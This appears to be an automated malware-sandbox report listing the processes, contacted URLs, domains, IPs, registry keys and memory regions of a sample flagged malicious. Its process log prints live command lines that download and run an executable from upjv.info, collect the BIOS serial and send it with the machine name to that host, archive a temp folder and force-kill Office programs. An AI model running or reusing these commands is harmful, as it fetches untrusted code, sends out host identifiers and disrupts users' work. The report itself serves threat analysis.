C:\Users\user\TMP\cr-20241021-53901\ariac.exe
\Users\user\TMP\cr-20241021-53901\ariac.exe -l log.txt -o clean.exe http://upjv.info/clean/clean2.exe
malicious
C:\Users\user\TMP\cr-20241021-53901\clean.exe
clean.exe -y
malicious
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
malicious
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe
\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe a \Users\user\TMP\cr-20241021-53901.zip \Users\user\TMP\cr-20241021-53901
malicious
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic bios get serialnumber
malicious
C:\Windows\SysWOW64\more.com
more +1 serialnumber.txt
malicious
C:\Users\user\TMP\cr-20241021-53901\ariac.exe
\Users\user\TMP\cr-20241021-53901\ariac.exe -l log2.txt -o result.html "http://upjv.info/clean/entree.php?poste=user-PC^&serial=F2LEUD3EOH"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" "http://upjv.info/clean/clean.php?serial=F2LEUD3EOH"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" http://upjv.info/clean/clean.php?serial=F2LEUD3EOH --attempting-deelevation
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" http://upjv.info/clean/clean.php?serial=F2LEUD3EOH
malicious
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2264 -parentBuildID 20230927232528 -prefsHandle 2208 -prefMapHandle 2200 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee62d03a-b3f3-4839-a2d9-d46293892022} 1088 "\\.\pipe\gecko-crash-server-pipe.1088" 2434ae6bb10 socket
malicious
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 420
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4164 -parentBuildID 20230927232528 -prefsHandle 4628 -prefMapHandle 4620 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {82d645db-fc8a-46d4-a6c6-6ecf6ff53d4a} 1088 "\\.\pipe\gecko-crash-server-pipe.1088" 2435dcb5e10 rdd
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5136 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5200 -prefMapHandle 5196 -prefsLen 33119 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02166d0c-fa79-4115-8a80-2fad783b6113} 1088 "\\.\pipe\gecko-crash-server-pipe.1088" 2435db1b910 utility
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM WINWORD.EXE /T /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM EXCEL.EXE /T /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SOFFICE.BIN /T /F
There are 11 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://upjv.inf
unknown
malicious
http://upjv.info
unknown
malicious
http://upjv.info/clean/entree.php?poste=user-PC
unknown
malicious
http://www.gnu.org/
unknown
http://detectportal.firefox.com8
unknown
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
unknown
https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
unknown
http://upjv.info/clean/clean2.exeCommonProgramFiles=C:
unknown
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
unknown
https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
unknown
https://merino.services.mozilla.com/api/v1/suggest
unknown
https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
unknown
https://www.leboncoin.fr/
unknown
https://spocs.getpocket.com/spocs
unknown
https://completion.amazon.com/search/complete?q=
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
unknown
https://portableapps.com/support/portable_app#upgrading
unknown
https://identity.mozilla.com/ids/ecosystem_telemetryU
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
unknown
https://monitor.firefox.com/breach-details/
unknown
http://upjv.info/clean/clean.php?serial=F2LEUD3EOHNUMBER_OF_PROCESSORS=2OneDrive=C:
unknown
http://www.hot.ee/somberg/7zip.html
unknown
https://github.com/w3c/csswg-drafts/issues/4650
unknown
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
unknown
https://xhr.spec.whatwg.org/#sync-warning
unknown
https://www.amazon.com/exec/obidos/external-search/
unknown
https://www.msn.com
unknown
https://portableapps.com/feeds/general
unknown
https://aria2.github.io/Usage:
unknown
https://github.com/mozilla-services/screenshots
unknown
https://services.addons.mozilla.org/api/v4/addons/addon/
unknown
https://tracking-protection-issues.herokuapp.com/new
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
unknown
https://content-signature-2.cdn.mozilla.net/
unknown
http://upjv.info/clean/clea4
unknown
https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2https:
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
unknown
https://www.7-zip.org/faq.html
unknown
https://api.accounts.firefox.com/v1
unknown
https://aria2.github.io/
unknown
http://upjv.info/favicon.ico
46.105.204.6
http://upjv.info/clean/entree.php?poste=%computername%
unknown
https://www.amazon.com/
unknown
https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
unknown
https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
unknown
https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
unknown
https://portableapps.com/support/portable_app#installing
unknown
https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
unknown
http://ocsp.rootca1.amazontrust.com0:
unknown
https://www.youtube.com/
unknown
https://upjv.info/
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
unknown
https://MD8.mozilla.org/1/m
unknown
https://www.google.com/complete/searchc1a6845f-015e-4e67-bc64-6e39a843643fa3f1a5b6-cd8d-41b3-bb2b-de
unknown
https://www.bbc.co.uk/
unknown
https://addons.mozilla.org/firefox/addon/to-google-translate/
unknown
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
unknown
http://127.0.0.1:
unknown
http://upjv.info/clean/clean.php?serial=F2LEUD3EOHy
unknown
https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
unknown
https://mitmdetection.services.mozilla.com/
unknown
https://shavar.services.mozilla.com/
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
unknown
https://upjv.info
unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
unknown
http://upjv.info/clean/clean.php?serial=F2LEUD3EOH--attempting-deelevation
unknown
https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
unknown
https://spocs.getpocket.com/
unknown
https://services.addons.mozilla.org/api/v4/abuse/report/addon/
unknown
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
unknown
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
unknown
https://www.iqiyi.com/
unknown
http://www.developershome.com/7-zip/
unknown
https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
unknown
http://www.teisininkas.lt/ivairus/7-zip:
unknown
https://monitor.firefox.com/user/breach-stats?includeResolved=true
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
unknown
https://spocs.getpocket.com/CN=The
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
unknown
http://a9.com/-/spec/opensearch/1.0/
unknown
http://upjv.info/clean/clea
unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
unknown
https://safebrowsing.google.com/safebrowsing/diagnostic?site=
unknown
http://www.chawg.org
unknown
https://monitor.firefox.com/user/dashboard
unknown
http://developer.mozilla.org/en/docs/DOM:element.addEventListenerUseOfReleaseEventsWarningUse
unknown
https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
unknown
https://monitor.firefox.com/about
unknown
http://mozilla.org/MPL/2.0/.
unknown
https://account.bellmedia.c
unknown
https://login.microsoftonline.com
unknown
https://coverage.mozilla.org
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
http://upjv.info/clean/clean.php?serial=F2LEUD3EOHen
unknown
https://www.zhihu.com/
unknown
http://x1.c.lencr.org/0
unknown
http://x1.i.lencr.org/0
unknown
http://www.prizeeinternational.com
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
upjv.info
46.105.204.6
malicious
example.org
93.184.215.14
star-mini.c10r.facebook.com
157.240.0.35
prod.classify-client.prod.webservices.mozgcp.net
35.190.72.216
prod.balrog.prod.cloudops.mozgcp.net
35.244.181.201
twitter.com
104.244.42.1
prod.detectportal.prod.cloudops.mozgcp.net
34.107.221.82
services.addons.mozilla.org
52.222.236.120
dyna.wikimedia.org
185.15.59.224
prod.remote-settings.prod.webservices.mozgcp.net
34.149.100.209
contile.services.mozilla.com
34.117.188.166
prod.content-signature-chains.prod.webservices.mozgcp.net
34.160.144.191
youtube-ui.l.google.com
216.58.212.174
reddit.map.fastly.net
151.101.193.140
us-west1.prod.sumo.prod.webservices.mozgcp.net
34.149.128.2
ipv4only.arpa
192.0.0.170
prod.ads.prod.webservices.mozgcp.net
34.117.188.166
push.services.mozilla.com
34.107.243.93
normandy-cdn.services.mozilla.com
35.201.103.21
telemetry-incoming.r53-2.services.mozilla.com
34.120.208.123
www.reddit.com
unknown
spocs.getpocket.com
unknown
content-signature-2.cdn.mozilla.net
unknown
support.mozilla.org
unknown
firefox.settings.services.mozilla.com
unknown
www.youtube.com
unknown
www.facebook.com
unknown
detectportal.firefox.com
unknown
normandy.cdn.mozilla.net
unknown
shavar.services.mozilla.com
unknown
www.wikipedia.org
unknown
There are 21 hidden domains, click here to show them.

IPs

IP
Domain
Country
Malicious
46.105.204.6
upjv.info
France
malicious
127.0.0.1
unknown
unknown
malicious
34.149.100.209
prod.remote-settings.prod.webservices.mozgcp.net
United States
34.107.243.93
push.services.mozilla.com
United States
34.107.221.82
prod.detectportal.prod.cloudops.mozgcp.net
United States
35.244.181.201
prod.balrog.prod.cloudops.mozgcp.net
United States
34.117.188.166
contile.services.mozilla.com
United States
52.222.236.120
services.addons.mozilla.org
United States
35.201.103.21
normandy-cdn.services.mozilla.com
United States
35.190.72.216
prod.classify-client.prod.webservices.mozgcp.net
United States
34.160.144.191
prod.content-signature-chains.prod.webservices.mozgcp.net
United States
34.120.208.123
telemetry-incoming.r53-2.services.mozilla.com
United States
There are 2 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\Launcher
C:\Program Files\Mozilla Firefox\firefox.exe|Launcher
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\Launcher
C:\Program Files\Mozilla Firefox\firefox.exe|Browser
HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\PreXULSkeletonUISettings
C:\Program Files\Mozilla Firefox\firefox.exe|Progress
HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\PreXULSkeletonUISettings
C:\Program Files\Mozilla Firefox\firefox.exe|Progress
HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\Default Browser Agent
C:\Program Files\Mozilla Firefox|AppLastRunTime
HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\PreXULSkeletonUISettings
C:\Program Files\Mozilla Firefox\firefox.exe|Maximized
HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\PreXULSkeletonUISettings
C:\Program Files\Mozilla Firefox\firefox.exe|UrlbarCSSSpan
HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\PreXULSkeletonUISettings
C:\Program Files\Mozilla Firefox\firefox.exe|SpringsCSSSpan
There are 1 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
28F0000
heap
page read and write
malicious
73E000
heap
page read and write
malicious
1B67000
heap
page read and write
malicious
2AE1000
heap
page read and write
malicious
2AE1000
heap
page read and write
malicious
24F0000
heap
page read and write
malicious
40D000
unkown
page write copy
malicious
D04000
heap
page read and write
malicious
2AB0000
heap
page read and write
malicious
295A9E94000
heap
page read and write
malicious
3186000
heap
page read and write
malicious
1B66000
heap
page read and write
malicious
21C0000
heap
page read and write
malicious
E30000
heap
page read and write
malicious
2A60000
heap
page read and write
malicious
2630000
heap
page read and write
malicious
D00000
heap
page read and write
malicious
730000
heap
page read and write
malicious
E00000
heap
page read and write
malicious
2AEE000
heap
page read and write
malicious
3070000
heap
page read and write
malicious
2AEE000
heap
page read and write
malicious
31B0000
heap
page read and write
malicious
B79000
heap
page read and write
malicious
1B68000
heap
page read and write
malicious
1819000
heap
page read and write
malicious
166D000
heap
page read and write
malicious
1810000
heap
page read and write
malicious
FA0000
heap
page read and write
malicious
40D000
unkown
page read and write
malicious
295A9E90000
heap
page read and write
malicious
2AEE000
heap
page read and write
malicious
FA9000
heap
page read and write
malicious
295A9A5A000
heap
page read and write
malicious
2AE1000
heap
page read and write
malicious
B5E000
heap
page read and write
malicious
530000
heap
page read and write
malicious
2B1E000
heap
page read and write
malicious
3130000
heap
page read and write
malicious
1660000
heap
page read and write
malicious
1CB4000
heap
page read and write
malicious
1CB0000
heap
page read and write
malicious
2AEE000
heap
page read and write
malicious
295A9A50000
heap
page read and write
malicious
2B1E000
heap
page read and write
malicious
3188000
heap
page read and write
malicious
2435EED2000
trusted library allocation
page read and write
2435D00B000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
BAF6000
heap
page read and write
2435EF78000
trusted library allocation
page read and write
24363721000
trusted library allocation
page read and write
3660000
direct allocation
page read and write
2436934D000
trusted library allocation
page read and write
2435D4E2000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435E1FE000
trusted library allocation
page read and write
2435DF84000
trusted library allocation
page read and write
243683FC000
trusted library allocation
page read and write
BC66000
heap
page read and write
24358DC6000
trusted library allocation
page read and write
24368AC1000
trusted library allocation
page read and write
2435D0FC000
trusted library allocation
page read and write
24365888000
trusted library allocation
page read and write
243633D0000
trusted library allocation
page read and write
24358FF6000
trusted library allocation
page read and write
2435BA74000
trusted library allocation
page read and write
2435E246000
trusted library allocation
page read and write
243680ED000
trusted library allocation
page read and write
2436808D000
trusted library allocation
page read and write
2435C7C3000
trusted library allocation
page read and write
1F527772000
trusted library allocation
page read and write
295AB64B000
heap
page read and write
2435EFA5000
trusted library allocation
page read and write
243652FC000
trusted library allocation
page read and write
2435B89E000
trusted library allocation
page read and write
2435C896000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435B4E6000
trusted library allocation
page read and write
2435E2ED000
trusted library allocation
page read and write
243658BB000
trusted library allocation
page read and write
3B80000
direct allocation
page read and write
2435DF8B000
trusted library allocation
page read and write
2FBD000
direct allocation
page read and write
2435E2D6000
trusted library allocation
page read and write
2434DA7E000
heap
page read and write
2434DA89000
heap
page read and write
2435C0D6000
trusted library allocation
page read and write
2435BA83000
trusted library allocation
page read and write
2434DAB8000
heap
page read and write
2435EE58000
trusted library allocation
page read and write
2435C0E6000
trusted library allocation
page read and write
2435936C000
trusted library allocation
page read and write
25EFE303000
heap
page read and write
2435B4F1000
trusted library allocation
page read and write
2435B858000
trusted library allocation
page read and write
2435B86C000
trusted library allocation
page read and write
2434D131000
heap
page read and write
2435E26F000
trusted library allocation
page read and write
2434DA76000
heap
page read and write
2435B68B000
trusted library allocation
page read and write
243680FE000
trusted library allocation
page read and write
2434DADA000
heap
page read and write
2435C7A2000
trusted library allocation
page read and write
2435DF0B000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2435C0B8000
trusted library allocation
page read and write
243658D6000
trusted library allocation
page read and write
24358F3B000
trusted library allocation
page read and write
D0C000
heap
page read and write
2434DA76000
heap
page read and write
2435D055000
trusted library allocation
page read and write
2B0E000
heap
page read and write
3560000
direct allocation
page read and write
2435EFA8000
trusted library allocation
page read and write
B653000
heap
page read and write
2435E0A9000
trusted library allocation
page read and write
243654E8000
trusted library allocation
page read and write
2BB2000
heap
page read and write
119E000
unkown
page read and write
184C7314000
heap
page read and write
2435EE11000
trusted library allocation
page read and write
37B1000
heap
page read and write
2434DA9B000
heap
page read and write
2435BA74000
trusted library allocation
page read and write
24368AE1000
trusted library allocation
page read and write
24368932000
trusted library allocation
page read and write
2435C761000
trusted library allocation
page read and write
2435B44D000
trusted library allocation
page read and write
2435DFD1000
trusted library allocation
page read and write
2436585C000
trusted library allocation
page read and write
3194000
heap
page read and write
2435C978000
trusted library allocation
page read and write
2435B413000
trusted library allocation
page read and write
2435DF7B000
trusted library allocation
page read and write
243652B3000
trusted library allocation
page read and write
2435E0E2000
trusted library allocation
page read and write
2435B4CD000
trusted library allocation
page read and write
2499000
heap
page read and write
2435EFC3000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2435B4BE000
trusted library allocation
page read and write
2AA0000
heap
page read and write
2435E1EE000
trusted library allocation
page read and write
2434DAE1000
heap
page read and write
2434DADD000
heap
page read and write
2434DA9B000
heap
page read and write
184C7E93000
heap
page read and write
2434DAB6000
heap
page read and write
243658D0000
trusted library allocation
page read and write
2436899C000
trusted library allocation
page read and write
243593D1000
trusted library allocation
page read and write
2435E244000
trusted library allocation
page read and write
400000
unkown
page readonly
184C7DDA000
heap
page read and write
2435B4B8000
trusted library allocation
page read and write
2435EDF1000
trusted library allocation
page read and write
2435C0A8000
trusted library allocation
page read and write
2435B62A000
trusted library allocation
page read and write
2435EF5C000
trusted library allocation
page read and write
2435C739000
trusted library allocation
page read and write
2435E123000
trusted library allocation
page read and write
2434DAC6000
heap
page read and write
2435B4DE000
trusted library allocation
page read and write
2435BA4F000
trusted library allocation
page read and write
2435E246000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
2435EF0D000
trusted library allocation
page read and write
2435C82B000
trusted library allocation
page read and write
2435EF44000
trusted library allocation
page read and write
2435DF4A000
trusted library allocation
page read and write
2435BA41000
trusted library allocation
page read and write
2435DF8E000
trusted library allocation
page read and write
24358FA0000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
2435B4BE000
trusted library allocation
page read and write
2435DFD7000
trusted library allocation
page read and write
243654F2000
trusted library allocation
page read and write
2435CC9F000
trusted library allocation
page read and write
1F527903000
trusted library allocation
page read and write
2C00000
heap
page read and write
2434DAE5000
heap
page read and write
2B17000
heap
page read and write
2435DD73000
trusted library allocation
page read and write
2435E263000
trusted library allocation
page read and write
2435C0FA000
trusted library allocation
page read and write
2435BA5F000
trusted library allocation
page read and write
184C7E39000
heap
page read and write
24365265000
trusted library allocation
page read and write
2435E254000
trusted library allocation
page read and write
2435D0DC000
trusted library allocation
page read and write
2435E278000
trusted library allocation
page read and write
2434DAB5000
heap
page read and write
2435EFA8000
trusted library allocation
page read and write
2435E1EA000
trusted library allocation
page read and write
24368156000
trusted library allocation
page read and write
468353E000
unkown
page readonly
4683E3E000
stack
page read and write
2434DA7D000
heap
page read and write
2435EDD7000
trusted library allocation
page read and write
2B80000
heap
page read and write
243680E9000
trusted library allocation
page read and write
2434DAC8000
heap
page read and write
2435EF6C000
trusted library allocation
page read and write
2435C786000
trusted library allocation
page read and write
24369605000
heap
page read and write
2435E090000
trusted library allocation
page read and write
243593B2000
trusted library allocation
page read and write
243653C6000
trusted library allocation
page read and write
8B2D3FF000
stack
page read and write
2434DADA000
heap
page read and write
195E000
stack
page read and write
2434DAB6000
heap
page read and write
243680DF000
trusted library allocation
page read and write
2435DF3F000
trusted library allocation
page read and write
243577AA000
heap
page read and write
2D30000
trusted library allocation
page read and write
2435DFF4000
trusted library allocation
page read and write
2435E123000
trusted library allocation
page read and write
24358CCA000
trusted library allocation
page read and write
240F000
stack
page read and write
24365898000
trusted library allocation
page read and write
2BB2000
heap
page read and write
BB02000
heap
page read and write
24368352000
trusted library allocation
page read and write
2435E1EA000
trusted library allocation
page read and write
24357CFB000
trusted library allocation
page read and write
24358DB1000
trusted library allocation
page read and write
2434DA89000
heap
page read and write
2435EE58000
trusted library allocation
page read and write
2435B46F000
trusted library allocation
page read and write
2435CA0A000
trusted library allocation
page read and write
24363725000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
24363743000
trusted library allocation
page read and write
24369675000
heap
page read and write
25EFE210000
unclassified section
page readonly
2435B858000
trusted library allocation
page read and write
1B74000
heap
page read and write
2435BAF6000
trusted library allocation
page read and write
2435E258000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
24368AAC000
trusted library allocation
page read and write
309A000
heap
page read and write
119F000
unkown
page write copy
243683FC000
trusted library allocation
page read and write
2435E22C000
trusted library allocation
page read and write
2435DAC7000
trusted library allocation
page read and write
1F527760000
trusted library allocation
page read and write
C94000
unkown
page write copy
2434DA9B000
heap
page read and write
B9F990E000
unkown
page readonly
2436346C000
trusted library allocation
page read and write
11A4000
unkown
page write copy
2434DA9B000
heap
page read and write
3760000
direct allocation
page read and write
3254000
heap
page read and write
2435E13C000
trusted library allocation
page read and write
2435DF6E000
trusted library allocation
page read and write
2434DAE1000
heap
page read and write
2435C792000
trusted library allocation
page read and write
42B000
unkown
page readonly
2434DABD000
heap
page read and write
2435E26D000
trusted library allocation
page read and write
24357792000
heap
page read and write
2435BA88000
trusted library allocation
page read and write
243637E1000
trusted library allocation
page read and write
4D10000
heap
page read and write
2435C0FA000
trusted library allocation
page read and write
2435EE58000
trusted library allocation
page read and write
2435DDF2000
trusted library allocation
page read and write
243689CF000
trusted library allocation
page read and write
2435DF27000
trusted library allocation
page read and write
2FB0000
direct allocation
page read and write
2BB2000
heap
page read and write
243656FC000
trusted library allocation
page read and write
3232000
heap
page read and write
2436944D000
trusted library allocation
page read and write
2436339A000
trusted library allocation
page read and write
2435C8F4000
trusted library allocation
page read and write
2435C7DF000
trusted library allocation
page read and write
2435EFAE000
trusted library allocation
page read and write
2435EFBB000
trusted library allocation
page read and write
2435E11D000
trusted library allocation
page read and write
24363830000
trusted library allocation
page read and write
243681E0000
trusted library allocation
page read and write
243577D3000
heap
page read and write
184C7DCF000
heap
page read and write
2435ED9E000
trusted library allocation
page read and write
24368305000
trusted library allocation
page read and write
1294000
unkown
page read and write
2436584D000
trusted library allocation
page read and write
295AB640000
heap
page read and write
2436339A000
trusted library allocation
page read and write
2435C8A6000
trusted library allocation
page read and write
2435C06E000
trusted library allocation
page read and write
24358DAD000
trusted library allocation
page read and write
2435DD3B000
trusted library allocation
page read and write
24363871000
trusted library allocation
page read and write
184C7DCD000
heap
page read and write
1296000
unkown
page write copy
3AA0000
direct allocation
page read and write
2435E22F000
trusted library allocation
page read and write
2435E258000
trusted library allocation
page read and write
2660000
heap
page read and write
24358DE1000
trusted library allocation
page read and write
2435C7F5000
trusted library allocation
page read and write
24368377000
trusted library allocation
page read and write
2435C82B000
trusted library allocation
page read and write
2B1D000
heap
page read and write
3820000
direct allocation
page read and write
2435E285000
trusted library allocation
page read and write
2435EFAE000
trusted library allocation
page read and write
2435C8E9000
trusted library allocation
page read and write
2435EEC3000
trusted library allocation
page read and write
2435BADC000
trusted library allocation
page read and write
2435E1AB000
trusted library allocation
page read and write
18EB9FD1000
trusted library allocation
page execute read
42B000
unkown
page readonly
243689CE000
trusted library allocation
page read and write
243684AC000
trusted library allocation
page read and write
4240000
direct allocation
page read and write
243577D8000
heap
page read and write
2434DA9B000
heap
page read and write
2435DF2B000
trusted library allocation
page read and write
24358F90000
trusted library allocation
page read and write
3AE0000
direct allocation
page read and write
243577AA000
heap
page read and write
2435D0F4000
trusted library allocation
page read and write
2435E2F7000
trusted library allocation
page read and write
2434DACA000
heap
page read and write
2435D460000
trusted library allocation
page read and write
243574DF000
trusted library allocation
page read and write
2435E0FB000
trusted library allocation
page read and write
2435B4E2000
trusted library allocation
page read and write
2B09000
heap
page read and write
2435C75D000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2434DADA000
heap
page read and write
24358D7D000
trusted library allocation
page read and write
2435DD71000
trusted library allocation
page read and write
24368380000
trusted library allocation
page read and write
2436848A000
trusted library allocation
page read and write
2B04000
heap
page read and write
243684A4000
trusted library allocation
page read and write
24368352000
trusted library allocation
page read and write
36D0000
direct allocation
page read and write
2434DA90000
heap
page read and write
184C7EE7000
heap
page read and write
243652C1000
trusted library allocation
page read and write
243658DF000
trusted library allocation
page read and write
2434DAC6000
heap
page read and write
2435EFE1000
trusted library allocation
page read and write
24358DB1000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
184C7281000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
2435EFA8000
trusted library allocation
page read and write
184C7DAF000
heap
page read and write
24358FFB000
trusted library allocation
page read and write
2435DF44000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
2435B462000
trusted library allocation
page read and write
2435BABB000
trusted library allocation
page read and write
2435D48B000
trusted library allocation
page read and write
24358D80000
trusted library allocation
page read and write
24368477000
trusted library allocation
page read and write
31A3000
heap
page read and write
184C7E9D000
heap
page read and write
2434DA7E000
heap
page read and write
2435D0FC000
trusted library allocation
page read and write
2435DEC3000
trusted library allocation
page read and write
2435C09B000
trusted library allocation
page read and write
24368156000
trusted library allocation
page read and write
2435ED34000
trusted library allocation
page read and write
2435DF7E000
trusted library allocation
page read and write
1299000
unkown
page readonly
2435E19B000
trusted library allocation
page read and write
2A66000
heap
page read and write
184C7E41000
heap
page read and write
2435ED07000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2A70000
heap
page read and write
2BB2000
heap
page read and write
2BB1000
heap
page read and write
2435DDC3000
trusted library allocation
page read and write
243652F6000
trusted library allocation
page read and write
2435D06B000
trusted library allocation
page read and write
2435EEC5000
trusted library allocation
page read and write
2435D091000
trusted library allocation
page read and write
2435DD6F000
trusted library allocation
page read and write
243633A2000
trusted library allocation
page read and write
1E8C1310000
heap
page read and write
24368470000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435CD16000
trusted library allocation
page read and write
2435CC69000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2434DAB0000
heap
page read and write
2435CA28000
trusted library allocation
page read and write
2435E123000
trusted library allocation
page read and write
2436843E000
trusted library allocation
page read and write
2434DAB2000
heap
page read and write
B8D000
stack
page read and write
2434DAB0000
heap
page read and write
2435E16B000
trusted library allocation
page read and write
2B18000
heap
page read and write
2435C82D000
trusted library allocation
page read and write
2436899C000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2435EF9C000
trusted library allocation
page read and write
1F5277C8000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435C752000
trusted library allocation
page read and write
24358F0F000
trusted library allocation
page read and write
2435B86E000
trusted library allocation
page read and write
2D2E000
stack
page read and write
37C0000
direct allocation
page read and write
24368097000
trusted library allocation
page read and write
2435E265000
trusted library allocation
page read and write
3470000
direct allocation
page read and write
243680E3000
trusted library allocation
page read and write
243577CA000
heap
page read and write
2435DD84000
trusted library allocation
page read and write
2435E17B000
trusted library allocation
page read and write
1F5273E3000
heap
page read and write
38E0000
direct allocation
page read and write
2436566B000
trusted library allocation
page read and write
2435DF6A000
trusted library allocation
page read and write
2435E45F000
trusted library allocation
page read and write
24368011000
trusted library allocation
page read and write
2435E26D000
trusted library allocation
page read and write
2435E1F0000
trusted library allocation
page read and write
24363721000
trusted library allocation
page read and write
2BB2000
heap
page read and write
243658B1000
trusted library allocation
page read and write
2435C80B000
trusted library allocation
page read and write
184C6FAA000
heap
page read and write
3880000
direct allocation
page read and write
2436341E000
trusted library allocation
page read and write
2435C75F000
trusted library allocation
page read and write
2435DF5C000
trusted library allocation
page read and write
39A0000
direct allocation
page read and write
2434DA7E000
heap
page read and write
2435C7FC000
trusted library allocation
page read and write
2435BA4D000
trusted library allocation
page read and write
3AD0000
direct allocation
page read and write
11A2000
unkown
page read and write
2435DB70000
trusted library allocation
